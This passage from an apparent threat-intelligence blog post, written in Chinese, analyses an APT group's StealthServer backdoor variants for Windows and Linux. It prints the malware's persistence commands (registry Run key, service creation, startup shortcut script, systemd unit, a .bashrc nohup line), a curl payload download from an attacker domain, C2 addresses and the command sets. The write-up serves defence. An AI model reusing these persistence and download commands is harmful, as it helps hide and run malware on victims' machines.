<p>&#x901A;&#x8FC7;&#x68C0;&#x67E5;&#x4E92;&#x65A5;&#x4F53;&#x6765;&#x5224;&#x65AD;&#x662F;&#x5426;&#x5DF2;&#x6709;&#x540C;&#x540D;&#x5B9E;&#x4F8B;&#x5728;&#x8FD0;&#x884C;&#xFF0C;&#x5BF9;&#x5B57;&#x7B26;&#x4E32;<code>nodejs_instance_mutex</code>&#x8BA1;&#x7B97; sha256 &#x4E4B;&#x540E;&#x62FC;&#x63A5;<code>Global\\%x</code>&#x5F97;&#x5230;&#x4E92;&#x65A5;&#x4F53;&#x540D;&#x79F0;&#xFF0C;&#x968F;&#x540E;&#x6267;&#x884C;&#x4E0B;&#x8FF0;&#x6307;&#x4EE4;&#x8FDB;&#x884C;&#x68C0;&#x6D4B;<code>cmd /C powershell -Command \&quot;$mutex = New-Object System.Threading.Mutex($false, &apos;%s&apos;); if($mutex.WaitOne(0)) { exit 0 } else { exit 1 }</code></p>
<h4 id="2-%E6%8C%81%E4%B9%85%E5%8C%96">2. &#x6301;&#x4E45;&#x5316;</h4>
<h5 id="%EF%BC%881%EF%BC%89%E9%9A%90%E8%97%8F%E6%96%87%E4%BB%B6">&#xFF08;1&#xFF09;&#x9690;&#x85CF;&#x6587;&#x4EF6;</h5>
<p>&#x628A;&#x81EA;&#x8EAB;&#x6587;&#x4EF6;&#x62F7;&#x8D1D;&#x5230;<code>%APPData</code>&#x76EE;&#x5F55;&#x4E0B;&#x5E76;&#x6539;&#x540D;&#x4E3A; nodejs.exe&#xFF0C;&#x6267;&#x884C;<code>attrib +h +s</code>&#x7ED9;&#x6587;&#x4EF6;&#x6DFB;&#x52A0;&#x9690;&#x85CF;&#x5C5E;&#x6027;&#x548C;&#x7CFB;&#x7EDF;&#x5C5E;&#x6027;&#xFF0C;&#x4F7F;&#x5F97;&#x6587;&#x4EF6;&#x4E0D;&#x53EF;&#x89C1;&#x3002;</p>
<h5 id="%EF%BC%882%EF%BC%89%E6%B3%A8%E5%86%8C%E8%A1%A8%E8%87%AA%E5%90%AF%E5%8A%A8">&#xFF08;2&#xFF09;&#x6CE8;&#x518C;&#x8868;&#x81EA;&#x542F;&#x52A8;</h5>
<p>&#x6267;&#x884C;<code>reg add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v nodejs /t REG_SZ /d \&quot;%s\&quot; /f</code>&#x5C06; nodejs.exe &#x6DFB;&#x52A0;&#x6CE8;&#x518C;&#x8868;&#x81EA;&#x542F;&#x52A8;&#x3002;</p>
<h5 id="%EF%BC%883%EF%BC%89%E8%87%AA%E5%8A%A8%E5%90%AF%E7%9B%AE%E5%BD%95">&#xFF08;3&#xFF09;&#x81EA;&#x52A8;&#x542F;&#x76EE;&#x5F55;</h5>
<p>&#x5728;&#x542F;&#x52A8;&#x76EE;&#x5F55; Startup &#x4E0B;&#x521B;&#x5EFA; .ps1 &#x6587;&#x4EF6;<code>create_shortcut.ps1</code>&#xFF0C;&#x4F7F;&#x7528; powershell &#x6267;&#x884C;&#x8BE5;&#x811A;&#x672C;&#x521B;&#x5EFA;&#x4E00;&#x4E2A; lnk &#x6587;&#x4EF6;<code>System Update.lnk</code>&#x5230;<code>\\Microsoft\\Windows\\Start Menu\\Programs\\Startup</code>&#x76EE;&#x5F55;&#xFF0C;&#x6587;&#x4EF6;&#x8DEF;&#x5F84;&#x6307;&#x5411; nodejs.exe&#x3002;</p>
<pre><code>$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut(&apos;%s&apos;)
$Shortcut.TargetPath = &apos;%s&apos;
$Shortcut.WorkingDirectory = &apos;%s&apos;
$Shortcut.WindowStyle = 7
$Shortcut.Save()
</code></pre>
<h5 id="%EF%BC%884%EF%BC%89%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1">&#xFF08;4&#xFF09;&#x8BA1;&#x5212;&#x4EFB;&#x52A1;</h5>
<p>&#x901A;&#x8FC7;&#x6267;&#x884C;<code>sc create &quot;NodeJSUpdater&quot; binPath= &quot;%s&quot; start= auto DisplayName= &quot;Node.js Background Updater&quot; type= own</code>&#x4EE5;&#x53CA;<code>sc start &quot;NodeJSUpdater&quot;</code>&#x521B;&#x5EFA;&#x8BA1;&#x5212;&#x4EFB;&#x52A1;&#x5B9E;&#x73B0;&#x5B9A;&#x671F;&#x6267;&#x884C;&#x3002;</p>
<h4 id="3-%E7%BD%91%E7%BB%9C%E9%80%9A%E4%BF%A1">3. &#x7F51;&#x7EDC;&#x901A;&#x4FE1;</h4>
<p>&#x6837;&#x672C;&#x4F7F;&#x7528;&#x7684;&#x670D;&#x52A1;&#x5668;&#x5730;&#x5740;&#x662F;<code>modindia.serveminecraft[.]net</code>&#xFF0C;&#x4F7F;&#x7528; TCP &#x534F;&#x8BAE;&#x6536;&#x53D1; JSON &#x683C;&#x5F0F;&#x7684;&#x6570;&#x636E;&#x8FDB;&#x884C;&#x4EA4;&#x4E92;&#xFF0C;&#x7AEF;&#x53E3;&#x4E3A; <code>8080</code>&#x3002;&#x4E0A;&#x7EBF;&#x5305;&#x683C;&#x5F0F;&#x5982;&#x4E0B;&#xFF0C;id &#x5B57;&#x6BB5;&#x786C;&#x7F16;&#x7801;&#x5728;&#x6837;&#x672C;&#x4E2D;&#xFF0C;&#x53EF;&#x80FD;&#x7528;&#x4E8E;&#x6807;&#x8BB0;&#x4E0D;&#x540C;&#x6279;&#x6B21;&#x7684;&#x6837;&#x672C;&#x6216;&#x6837;&#x672C;&#x7684;&#x7248;&#x672C;&#xFF0C;location &#x5B57;&#x6BB5;&#x7528;&#x201C;windows - &#x201D;&#x62FC;&#x63A5;&#x5F53;&#x524D;&#x4E3B;&#x673A;&#x540D;&#xFF0C;antivirus &#x5B57;&#x6BB5;&#x8868;&#x793A;&#x6740;&#x8F6F;&#x540D;&#x3002;&#x901A;&#x4FE1;&#x903B;&#x8F91;&#x7684;&#x4E0A;&#x4E0B;&#x6587;&#x4E2D;&#x4E5F;&#x63BA;&#x6742;&#x7740;&#x5927;&#x91CF;&#x5783;&#x573E;&#x4EE3;&#x7801;&#xFF0C;&#x7528;&#x4E8E;&#x5E72;&#x6270;&#x5206;&#x6790;&#x8FC7;&#x7A0B;&#x3002;</p>
<pre><code>{
  &quot;id&quot;: &quot;633734336633383138326436323966326463656638303966363166663933356163363239363364eae2d6e4&quot;,
  &quot;location&quot;: &quot;windows - DAJI0A22&quot;,
  &quot;antivirus&quot;: &quot;Unknown&quot;
}
</code></pre>
<p>&#x652F;&#x6301;&#x5982;&#x4E0B;&#x4E09;&#x4E2A;&#x6307;&#x4EE4;&#x3002;</p>
<pre><code>LIST&#xFF1A;&#x83B7;&#x53D6;&#x6587;&#x4EF6;&#x5217;&#x8868;
UPLOAD&#xFF1A;&#x4E0A;&#x4F20;&#x6307;&#x5B9A;&#x6587;&#x4EF6;
DOWNLOAD&#xFF1A;&#x4E0B;&#x8F7D;&#x6307;&#x5B9A;&#x6587;&#x4EF6;
</code></pre>
<h2 id="windows-v2-tcp"><strong>Windows-V2: TCP</strong></h2>
<p>&#x516B;&#x6708;&#x5E95;&#x53D1;&#x73B0;&#x4E86;&#x53E6;&#x5916;&#x4E00;&#x4E2A;&#x7248;&#x672C;&#x7684; Windows &#x53D8;&#x79CD;&#xFF0C;&#x6587;&#x4EF6;&#x540D;&#x4E3A; <strong>&#x201C;proxifiersetup.exe&#x201D;</strong>&#xFF0C;&#x8BE5;&#x53D8;&#x79CD;&#x5BF9;&#x6838;&#x5FC3;&#x529F;&#x80FD;&#x51FD;&#x6570;&#x7684;&#x540D;&#x5B57;&#x8FDB;&#x884C;&#x4E86;&#x6DF7;&#x6DC6;&#xFF0C;&#x5F00;&#x53D1;&#x8DEF;&#x5F84;&#x4E3A;<code>D:/bossmaya/newblkul/client/client_obfuscated.go</code>&#xFF0C;&#x548C;&#x4E0B;&#x6587;&#x4ECB;&#x7ECD;&#x7684; Linux &#x7248;&#x672C;&#x4F7F;&#x7528;&#x4E86;&#x76F8;&#x540C;&#x7684;&#x8DEF;&#x5F84;&#xFF0C;&#x800C;&#x4E14;&#x63D0;&#x793A;&#x4FE1;&#x606F;&#x91CC;&#x8868;&#x660E;&#x4E86;&#x8BE5;&#x53D8;&#x79CD;&#x7684;&#x540D;&#x5B57;&#x4E3A;<code>&#x201C;ULTRA-CLIENT&#x201D;</code>&#x3002;&#x57FA;&#x672C;&#x529F;&#x80FD;&#x53EA;&#x53D1;&#x751F;&#x4E86;&#x4E00;&#x70B9;&#x53D8;&#x5316;&#x6BD4;&#x5982;&#x591A;&#x4E86;&#x68C0;&#x6D4B;<code>Ollydbg&#x3001;x64dbg&#x3001;IDA</code>&#x7B49;&#x5B89;&#x5168;&#x5206;&#x6790;&#x5DE5;&#x5177;&#x7684;&#x53CD;&#x8C03;&#x8BD5;&#x7684;&#x65B9;&#x6CD5;&#xFF0C;&#x5176;&#x4ED6;&#x65B9;&#x9762;&#x6CA1;&#x6709;&#x592A;&#x591A;&#x53D8;&#x5316;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/ULTRA-Client.png" alt="ULTRA-Client.png" loading="lazy"></p>
<p>&#x7F51;&#x7EDC;&#x901A;&#x4FE1;&#x65B9;&#x9762;&#xFF0C;&#x8FDC;&#x7A0B; C2 &#x901A;&#x8FC7; XOR &#x52A0;&#x5BC6;&#xFF0C;&#x4F46;&#x5B9E;&#x9645;&#x8FD8;&#x5185;&#x7F6E;&#x4E86;&#x4E24;&#x4E2A;&#x5907;&#x4EFD; IP&#xFF0C;C2 &#x4F7F;&#x7528;&#x7684;&#x7AEF;&#x53E3;&#x90FD;&#x662F;<code>8080</code>&#x3002;</p>
<pre><code>sinjita[.]store
45.155.54[.]122
45.155.54[.]62
</code></pre>
<p>&#x4E0A;&#x7EBF;&#x5305;&#x7A0D;&#x5FAE;&#x53D1;&#x751F;&#x4E86;&#x4E00;&#x70B9;&#x53D8;&#x5316;&#xFF0C;&#x589E;&#x52A0;&#x4E86;&#x4E00;&#x4E2A;<code>os</code>&#x5B57;&#x6BB5;&#xFF0C;<code>id</code>&#x5B57;&#x6BB5;&#x7531;&#x968F;&#x673A;&#x751F;&#x6210;&#x7684; 8 &#x4E2A;&#x5B57;&#x8282;&#x62FC;&#x63A5;&#x800C;&#x6765;&#xFF0C;&#x652F;&#x6301;&#x7684;&#x4E09;&#x4E2A;&#x6307;&#x4EE4;<code>LIST&#x3001;UPLOAD&#x3001;DOWNLOAD</code>&#x6CA1;&#x53D8;&#x3002;</p>
<pre><code>{
  &quot;id&quot;: &quot;ultra_client_6edc15ad7feac78f&quot;,
  &quot;location&quot;: &quot;Roubaix, Hauts-de-France, France - UltraPC(Rubin)&quot;,
  &quot;os&quot;: &quot;Microsoft Windows [&#xFFFD;&#xE6;&#xB1;&#xBE; 10.0.22621.4317&quot;,
  &quot;antivirus&quot;: &quot;Windows Defender&quot;
}
</code></pre>
<h2 id="windows-v3-websocket"><strong>Windows-V3: WebSocket</strong></h2>
<p>&#x516B;&#x6708;&#x5E95;&#x6355;&#x83B7;&#x4E86;&#x53E6;&#x4E00;&#x4E2A;&#x53D8;&#x79CD;&#xFF0C;&#x6539;&#x4E3A;&#x4F7F;&#x7528; WebSocket &#x534F;&#x8BAE;&#x901A;&#x4FE1;&#xFF0C;C2 &#x670D;&#x52A1;&#x5668;&#x4E3A;<code>ws://kavach[.]space:5500</code>&#xFF0C;&#x529F;&#x80FD;&#x4E0E;&#x4E0B;&#x9762;&#x8981;&#x4ECB;&#x7ECD;&#x7684; Linux &#x7248;&#x672C;&#x4E8C;&#x76F8;&#x540C;&#xFF0C;&#x6B64;&#x5904;&#x4E0D;&#x4F5C;&#x8D58;&#x8FF0;&#x3002;</p>
<h2 id="linux-v1-http"><strong>Linux-V1: HTTP</strong></h2>
<h3 id="loader">#Loader</h3>
<p>Linux &#x53D8;&#x79CD;&#x7684;&#x7B2C;&#x4E00;&#x4E2A;&#x7248;&#x672C;&#x53D1;&#x73B0;&#x5728;&#x516B;&#x6708;&#x521D;&#xFF0C;&#x5165;&#x53E3;&#x6837;&#x672C;&#x662F;&#x4E00;&#x4E2A;&#x540D;&#x4E3A; <strong>&#x201C;Meeting_Ltr_ID1543ops.pdf.desktop&#x201D;</strong> &#x7684;&#x6587;&#x4EF6;&#xFF0C;&#x201C;.desktop&#x201D;&#x6587;&#x4EF6;&#x5373; Linux &#x7684;&#x5FEB;&#x6377;&#x65B9;&#x5F0F;&#x6216;&#x7A0B;&#x5E8F;&#x542F;&#x52A8;&#x5668;&#xFF0C;&#x7C7B;&#x4F3C; Windows &#x7684; .lnk &#x5FEB;&#x6377;&#x65B9;&#x5F0F;&#x6587;&#x4EF6;&#x3002;&#x9891;&#x7E41;&#x4F7F;&#x7528; .desktop &#x6587;&#x4EF6;&#x4F5C;&#x4E3A; loader &#x6765;&#x6295;&#x9012;&#x4E0D;&#x540C;&#x5DE5;&#x5177;&#xFF0C;&#x662F;&#x8BE5;&#x7EC4;&#x7EC7;&#x4E00;&#x4E2A;&#x660E;&#x663E;&#x7684;&#x884C;&#x4E3A;&#x7279;&#x5F81;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/Linux-V1-Loader.png" alt="Linux-V1-Loader.png" loading="lazy"></p>
<p>&#x8FD9;&#x4E2A; .desktop &#x6587;&#x4EF6;&#x8868;&#x9762;&#x4E0A;&#x4F2A;&#x88C5;&#x6210;&#x4E00;&#x4E2A; PDF &#x6587;&#x6863;&#x7684;&#x5FEB;&#x6377;&#x65B9;&#x5F0F;&#xFF0C;&#x5728;&#x684C;&#x9762;/&#x83DC;&#x5355;&#x4E2D;&#x663E;&#x793A;&#x7684;&#x540D;&#x5B57;&#x662F; <strong>&#x201C;Meeting_Ltr_ID1543ops.pdf&#x201D;</strong>&#xFF0C;&#x6267;&#x884C;&#x540E;&#x4F1A;&#x6253;&#x5F00;&#x7528;&#x6237;&#x673A;&#x5668;&#x4E0A;&#x7684; Firefox &#x6D4F;&#x89C8;&#x5668;&#x8BBF;&#x95EE;&#x4E00;&#x4E2A; GoogleDrive &#x9875;&#x9762;&#x8BEF;&#x5BFC;&#x7528;&#x6237;&#xFF0C;&#x8FD9;&#x662F;&#x4E00;&#x4EFD;&#x6807;&#x6709; <strong>&#x201C;CONFIDENTIAL&#xFF08;&#x673A;&#x5BC6;&#xFF09;&#x201D;</strong> &#x7684;&#x6587;&#x4EF6;&#xFF0C;&#x5185;&#x5BB9;&#x5927;&#x81F4;&#x662F; <strong>&#x201C;&#x67D0;&#x56FD;&#x56FD;&#x9632;&#x7814;&#x7A76;&#x4E0E;&#x53D1;&#x5C55;&#x7EC4;&#x7EC7;&#xFF08;DRDO&#xFF09;&#x4E0E;&#x4EE5;&#x8272;&#x5217;&#x56FD;&#x9632;&#x4F01;&#x4E1A;&#x5728;&#x6ED1;&#x7FD4;&#x70B8;&#x5F39;&#x548C;&#x9AD8;&#x901F;&#x7CFB;&#x7EDF;&#xFF08;&#x5305;&#x62EC;&#x9AD8;&#x8D85;&#x97F3;&#x901F;&#x63A8;&#x8FDB;&#x6280;&#x672F;&#x7B49;&#xFF09;&#x65B9;&#x9762;&#x7684;&#x7814;&#x53D1;&#x8054;&#x76DF;&#x76F8;&#x5173;&#x4E8B;&#x5B9C;&#x201D;</strong>&#xFF0C;&#x8FD9;&#x4E5F;&#x7B26;&#x5408;&#x8BE5;&#x7EC4;&#x7EC7;&#x5E38;&#x7528;&#x7684;&#x9493;&#x9C7C;&#x4E3B;&#x9898;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/Linux-V1-PDF.png" alt="Linux-V1-PDF.png" loading="lazy"></p>
<p>&#x5B9E;&#x9645;&#x4E0A;&#x4F1A;&#x4ECE;&#x8FDC;&#x7A0B;&#x6076;&#x610F;&#x670D;&#x52A1;&#x5668;&#x4E0B;&#x8F7D;&#x4E00;&#x4E2A;&#x6587;&#x4EF6; <strong>&#x201C;Mt_dated_29.txt&#x201D;</strong>&#xFF0C;&#x4FDD;&#x5B58;&#x5230; /tmp &#x76EE;&#x5F55;&#x4E0B;&#x4E14;&#x547D;&#x540D;&#x683C;&#x5F0F;&#x4E3A;<code>&#x201C;/tmp/Meeting_Ltr_ID1543ops.pdf-$(date +%s)&#x201D;</code>&#x3002;&#x8FD9;&#x4E2A;&#x6587;&#x4EF6;&#x5C31;&#x662F; StealthServer&#xFF0C;&#x4F46;&#x662F;&#x662F;&#x5341;&#x516D;&#x8FDB;&#x5236; HEX &#x683C;&#x5F0F;&#x7684;&#x5B57;&#x7B26;&#x4E32;&#x5185;&#x5BB9;&#xFF0C;&#x56E0;&#x6B64;&#x4F7F;&#x7528;<code>&#x201C;xxd -r -p&#x201D;</code>&#x547D;&#x4EE4;&#x5C06;&#x5176;&#x6062;&#x590D;&#x4E3A;&#x4E8C;&#x8FDB;&#x5236; ELF &#x6587;&#x4EF6;&#xFF0C;&#x7136;&#x540E;<code>&#x201C;chmod +x&#x201D;</code>&#x4E4B;&#x540E;&#x6267;&#x884C;&#x3002;</p>
<pre><code>curl -s &quot;https://securestore[.]cv/ghg/Mt_dated_29.txt&quot;
</code></pre>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/Linux-V1-ELF.png" alt="Linux-V1-ELF.png" loading="lazy"></p>
<p>&#x53E6;&#x4E00;&#x4E2A;&#x53D8;&#x79CD;&#x7684; Loader &#x4F7F;&#x7528;&#x5341;&#x516D;&#x8FDB;&#x884C; HEX &#x5B57;&#x7B26;&#x4E32;&#x7684;&#x683C;&#x5F0F;&#x7F16;&#x7801; URL&#xFF0C;&#x800C;&#x975E; base64&#xFF0C;&#x5982;&#x4E0B;&#x56FE;&#x6240;&#x793A;&#x53D8;&#x91CF; a &#x89E3;&#x7801;&#x540E;&#x662F;<code>https://trmm[.]space/SoftsCompany/d/27/clipboard.txt</code>&#xFF0C;b &#x89E3;&#x7801;&#x540E;&#x662F;<code>&#x201C;firefox&#x201D;</code>&#xFF0C;c &#x89E3;&#x7801;&#x540E;&#x662F;&#x7528;&#x4E8E;&#x8BEF;&#x5BFC;&#x7684; pdf &#x94FE;&#x63A5;<code>https://drive.google.com/file/d/1C-PH7EEOhv5gjYzKnsz_KGBe48454QGc/view?usp=sharing</code>&#xFF0C;&#x529F;&#x80FD;&#x662F;&#x76F8;&#x540C;&#x7684;&#xFF0C;&#x4E0D;&#x518D;&#x8D58;&#x8FF0;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/Linux-V1-Another-Sample.png" alt="Linux-V1-Another-Sample.png" loading="lazy"></p>
<h3 id="stealthserver">#StealthServer</h3>
<p>&#x548C; Windows &#x7248;&#x672C;&#x7684;&#x6837;&#x672C;&#x4E0D;&#x540C;&#xFF0C;Linux &#x7248;&#x672C;&#x7684; StealthServer &#x7684;&#x4EE3;&#x7801;&#x8FDB;&#x884C;&#x4E86;&#x51FD;&#x6570;&#x540D;&#x6DF7;&#x6DC6;&#xFF0C;&#x5F00;&#x53D1;&#x8DEF;&#x5F84;&#x4E3A; <code>D:/bossmaya/client/obfuscated_client.go</code>&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/Linux-V1-Client.png" alt="Linux-V1-Client.png" loading="lazy"></p>
<h5 id="1-junk-codejunk-function">1. Junk code/Junk Function</h5>
<p>init &#x548C; main &#x51FD;&#x6570;&#x524D;&#x9762;&#x5927;&#x90E8;&#x5206;&#x5185;&#x5BB9;&#x90FD;&#x662F; Junk Function &#x548C; Junk Code&#xFF0C;&#x7528;&#x4E8E;&#x5E72;&#x6270;&#x5206;&#x6790;&#xFF0C;Junk Code &#x4E3B;&#x8981;&#x662F;&#x6267;&#x884C;&#x65E0;&#x610F;&#x4E49;&#x4EE3;&#x7801;&#xFF0C;&#x5305;&#x62EC;&#x4E24;&#x7C7B;&#xFF0C;&#x4E00;&#x7C7B;&#x662F;&#x6BD4;&#x5982;&#x5305;&#x542B;&#x7A7A;&#x4EE3;&#x7801;&#x7684;&#x5927;&#x91CF;&#x5FAA;&#x73AF;&#x548C;&#x4F11;&#x7720;&#xFF0C;&#x53E6;&#x4E00;&#x7C7B;&#x662F;&#x5BF9;&#x4E00;&#x6BB5;&#x65E0;&#x610F;&#x4E49;&#x6570;&#x636E;&#x8FDB;&#x884C;&#x5FAA;&#x73AF;&#x538B;&#x7F29;/&#x52A0;&#x5BC6;/&#x89E3;&#x5BC6;&#x3002;</p>
<h5 id="2-%E5%8F%8D%E8%B0%83%E8%AF%95">2. &#x53CD;&#x8C03;&#x8BD5;</h5>
<p>&#x901A;&#x8FC7;&#x83B7;&#x53D6; /proc/self/status &#x6587;&#x4EF6;&#x7684;&#x5185;&#x5BB9;&#xFF0C;&#x5224;&#x65AD;&#x91CC;&#x9762;&#x5305;&#x542B;&#x7684;&#x8FDB;&#x7A0B;&#x72B6;&#x6001;&#x4FE1;&#x606F;<code>&#x201C;TracerPid: N&#x201D;</code>&#x3002;</p>
<ul>
<li>&#x5982;&#x679C; N = 0 &#x2192; &#x6CA1;&#x6709;&#x88AB;&#x8C03;&#x8BD5;&#x5668;&#x8DDF;&#x8E2A;&#x3002;</li>
<li>&#x5982;&#x679C; N &#x2260; 0 &#x2192; &#x88AB;&#x67D0;&#x4E2A;&#x8C03;&#x8BD5;&#x5668;&#xFF08;&#x5982; gdb&#x3001;strace&#xFF09;&#x9644;&#x52A0;&#x3002;</li>
</ul>
<h5 id="3-%E6%8C%81%E4%B9%85%E5%8C%96">3. &#x6301;&#x4E45;&#x5316;</h5>
<p><strong>&#xFF08;1&#xFF09;&#x6DFB;&#x52A0;&#x7CFB;&#x7EDF;&#x670D;&#x52A1;</strong></p>
<p>&#x9996;&#x5148;&#x5728;&#x5F53;&#x524D;&#x7528;&#x6237;&#x76EE;&#x5F55;&#x4E0B;&#x521B;&#x5EFA;&#x5982;&#x4E0B;&#x76EE;&#x5F55;&#x7ED3;&#x6784;&#xFF0C;&#x5176;&#x4E2D; <code>&#x201C;/home/username/.config/systemd/user/default.target.wants/system-update.service&#x201D;</code>&#x662F;&#x4E00;&#x4E2A;&#x7B26;&#x53F7;&#x94FE;&#x63A5; &#x6307;&#x5411;<code>&#x201C;/home/username/.config/systemd/user/system-update.service&#x201D;</code>&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/systemd-service.png" alt="systemd-service.png" loading="lazy"></p>
<p>&#x7136;&#x540E;&#x5C06;&#x81EA;&#x8EAB; ELF &#x6587;&#x4EF6;&#x62F7;&#x8D1D;&#x5230;<code>&#x201C;/home/username/.config/systemd/systemd-update&#x201D;</code>&#xFF0C;&#x5E76;&#x91CA;&#x653E;&#x670D;&#x52A1;&#x6587;&#x4EF6;<code>&#x201C;/home/username/.config/systemd/user/system-update.service&#x201D;</code>&#xFF0C;&#x4E3B;&#x8981;&#x662F;&#x4FDD;&#x8BC1;&#x6837;&#x672C;&#x4E00;&#x76F4;&#x5904;&#x4E8E;&#x8FD0;&#x884C;&#x72B6;&#x6001;&#xFF0C;&#x6700;&#x540E;&#x4F7F;&#x7528; systemctl &#x542F;&#x52A8;&#x8BE5;&#x670D;&#x52A1;&#xFF0C;&#x6587;&#x4EF6;&#x5185;&#x5BB9;&#x5982;&#x4E0B;&#x3002;</p>
<pre><code>[Unit]
Description=System Update Service
After=network.target

[Service]
Type=simple
ExecStart=/home/username/.config/systemd/systemd-update
Restart=always
RestartSec=10
User=username

[Install]
WantedBy=default.target
</code></pre>
<p><strong>&#xFF08;2&#xFF09;&#x5728; ~/.bashrc &#x548C; ~/.profile &#x6587;&#x4EF6;&#x5C3E;&#x90E8;&#x589E;&#x52A0;&#x542F;&#x52A8;&#x6307;&#x4EE4;</strong></p>
<p><code>~/.bashrc</code>&#x662F; bash shell &#x7684;&#x914D;&#x7F6E;&#x6587;&#x4EF6;&#xFF0C;&#x5728; shell &#x542F;&#x52A8;&#x65F6;&#x52A0;&#x8F7D;&#x5E76;&#x6267;&#x884C;&#x5176;&#x4E2D;&#x7684;&#x9884;&#x914D;&#x7F6E;&#x6307;&#x4EE4;&#xFF0C;<code>~/.profile</code>&#x7528;&#x4E8E;&#x73AF;&#x5883;&#x53D8;&#x91CF;&#x3001;&#x7528;&#x6237;&#x767B;&#x5F55;&#x65F6;&#x7684;&#x521D;&#x59CB;&#x5316;&#x64CD;&#x4F5C;&#xFF0C;&#x589E;&#x52A0;&#x7684;&#x6307;&#x4EE4;&#x5982;&#x4E0B;&#xFF0C;&#x7528;&#x4E8E;&#x5728;&#x540E;&#x53F0;&#x542F;&#x52A8;&#x6837;&#x672C;&#x3002;</p>
<pre><code># System update service
nohup /home/username/.config/systemd/systemd-update &gt;/dev/null 2&gt;&amp;1 &amp;
</code></pre>
<h5 id="4-%E7%BD%91%E7%BB%9C%E9%80%9A%E4%BF%A1%EF%BC%9A%E6%94%AF%E6%8C%81%E4%B8%89%E4%B8%AA%E6%8C%87%E4%BB%A4">4. &#x7F51;&#x7EDC;&#x901A;&#x4FE1;&#xFF1A;&#x652F;&#x6301;&#x4E09;&#x4E2A;&#x6307;&#x4EE4;</h5>
<p>C2 &#x670D;&#x52A1;&#x5668;&#x5730;&#x5740;&#x4E3A;<code>&#x201C;modgovindia[.]space&#x201D;</code>&#xFF0C;&#x548C; Windows &#x7248;&#x672C;&#x7684;&#x57DF;&#x540D;<code>&#x201C;modindia.serveminecraft[.]net&#x201D;</code>&#x89E3;&#x6790;&#x5230;&#x4E86;&#x76F8;&#x540C;&#x7684; IP &#x5730;&#x5740;<code>&#x201C;101.99.94[.]109&#x201D;</code>&#x3002;&#x5177;&#x4F53;&#x901A;&#x4FE1;&#x8FC7;&#x7A0B;&#x5982;&#x4E0B;&#xFF0C;&#x9996;&#x5148; HTTP &#x8BF7;&#x6C42; <code>&#x201C;http://modgovindia[.]space:4000/health&#x201D;</code>&#xFF0C;&#x5224;&#x65AD;&#x670D;&#x52A1;&#x5668;&#x662F;&#x5426;&#x6D3B;&#x8DC3;&#xFF0C;&#x54CD;&#x5E94;&#x5185;&#x5BB9;&#x4E2D;&#x7684; service &#x5B57;&#x6BB5;&#x6307;&#x660E;&#x4E86;&#x8BE5;&#x5DE5;&#x5177;&#x7684;&#x540D;&#x5B57;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/health.png" alt="health.png" loading="lazy"></p>
<p>&#x7136;&#x540E;&#x8BF7;&#x6C42;<code>http://modgovindia[.]space:4000/commands</code>&#xFF0C;&#x5C1D;&#x8BD5;&#x83B7;&#x53D6;&#x6307;&#x4EE4;&#xFF0C;&#x54CD;&#x5E94;&#x5185;&#x5BB9;&#x662F; JSON &#x683C;&#x5F0F;&#xFF0C;&#x652F;&#x6301;&#x4E0B;&#x9762;&#x4E09;&#x4E2A;&#x6307;&#x4EE4;&#x3002;&#x6700;&#x540E;&#x628A;&#x6267;&#x884C;&#x5B8C;&#x7684;&#x547D;&#x4EE4;&#x7684;&#x7ED3;&#x679C;&#x901A;&#x8FC7;&#x8BF7;&#x6C42;<code>http://modgovindia[.]space:4000/command-response</code>&#x54CD;&#x5E94;&#x7ED9; C2&#x3002;</p>
<pre><code>1&#xFF09;&apos;browse&apos;
&#x904D;&#x5386;&#x6307;&#x5B9A;&#x76EE;&#x5F55;&#x4E0B;&#x7684;&#x6587;&#x4EF6;&#x5217;&#x8868;&#xFF0C;&#x54CD;&#x5E94;&#x5185;&#x5BB9;&#x4E2D;&#x7684; &apos;path&apos; &#x5B57;&#x6BB5;&#x6307;&#x793A;&#x4E86;&#x76EE;&#x6807;&#x8DEF;&#x5F84;&#x3002;
2&#xFF09;&apos;upload&apos;
&#x4E0A;&#x4F20;&#x6307;&#x5B9A;&#x6587;&#x4EF6;&#x3002;
3&#xFF09;&apos;execute&apos;
&#x6267;&#x884C; bash &#x547D;&#x4EE4;&#x3002;
</code></pre>
<h5 id="5-%E7%AA%83%E5%8F%96%E6%96%87%E4%BB%B6">5. &#x7A83;&#x53D6;&#x6587;&#x4EF6;</h5>
<p>&#x4ECE;&#x6839;&#x76EE;&#x5F55;<code>/</code>&#x5F00;&#x59CB;&#x904D;&#x5386;&#xFF0C;&#x641C;&#x7D22;&#x6240;&#x6709;&#x5982;&#x4E0B;&#x540E;&#x7F00;&#x7684;&#x6587;&#x4EF6;&#x3002;</p>
<pre><code>.pdf
.doc
.xls
.ppt
.txt
.zip
.rar
</code></pre>
<p>&#x5F53;&#x904D;&#x5386;&#x5230;&#x4E0A;&#x8FF0;&#x540E;&#x7F00;&#x7684;&#x6587;&#x4EF6;&#xFF0C;&#x9996;&#x5148;&#x53D1;&#x9001;&#x4E00;&#x4E2A; GET &#x8BF7;&#x6C42;&#x901A;&#x77E5;&#x670D;&#x52A1;&#x5668;&#xFF0C;X-Username &#x5B57;&#x6BB5;&#x662F;&#x5F53;&#x524D;&#x7528;&#x6237;&#x7684;&#x540D;&#x5B57;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/09/status-file.png" alt="status-file.png" loading="lazy"></p>
